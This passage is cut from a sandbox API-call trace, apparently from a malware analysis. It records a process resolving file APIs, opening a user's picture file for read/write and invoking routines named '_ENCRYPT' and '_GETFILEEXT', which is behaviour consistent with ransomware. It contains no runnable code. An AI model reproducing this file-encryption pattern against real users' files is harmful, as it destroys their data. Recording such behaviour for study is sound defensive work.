(lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cda8 [0039.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cda8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.360] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0039.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cda8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.360] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0039.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0039.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", cchWideChar=56, lpMultiByteStr=0x7c2080, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", lpUsedDefaultChar=0x0) returned 56 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.361] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\awahow6k zd3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=56, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0039.361] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=56, lpWideCharStr=0x7db378, cchWideChar=56 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png") returned 56 [0039.361] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.362] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.362] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0039.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.363] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.363] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.363] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.364] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.364] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.364] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0039.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0039.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.364] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.364] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.365] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0039.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cd90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.365] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.365] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.365] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.365] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.365] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.366] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.366] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0039.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.366] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1a3d90, ftCreationTime.dwHighDateTime=0x1d5bcad, ftLastAccessTime.dwLowDateTime=0x38fb4360, ftLastAccessTime.dwHighDateTime=0x1d5c4a0, ftLastWriteTime.dwLowDateTime=0x38fb4360, ftLastWriteTime.dwHighDateTime=0x1d5c4a0, nFileSizeHigh=0x0, nFileSizeLow=0x1801b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AwaHoW6K ZD3.png", cAlternateFileName="AWAHOW~1.PNG")) returned 0x7c20c0 [0039.367] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.367] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1a3d90, ftCreationTime.dwHighDateTime=0x1d5bcad, ftLastAccessTime.dwLowDateTime=0x38fb4360, ftLastAccessTime.dwHighDateTime=0x1d5c4a0, ftLastWriteTime.dwLowDateTime=0x38fb4360, ftLastWriteTime.dwHighDateTime=0x1d5c4a0, nFileSizeHigh=0x0, nFileSizeLow=0x1801b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AwaHoW6K ZD3.png", cAlternateFileName="AWAHOW~1.PNG")) returned 0x7c20c0 [0039.367] FindClose (in: hFindFile=0x7c20c0 | out: 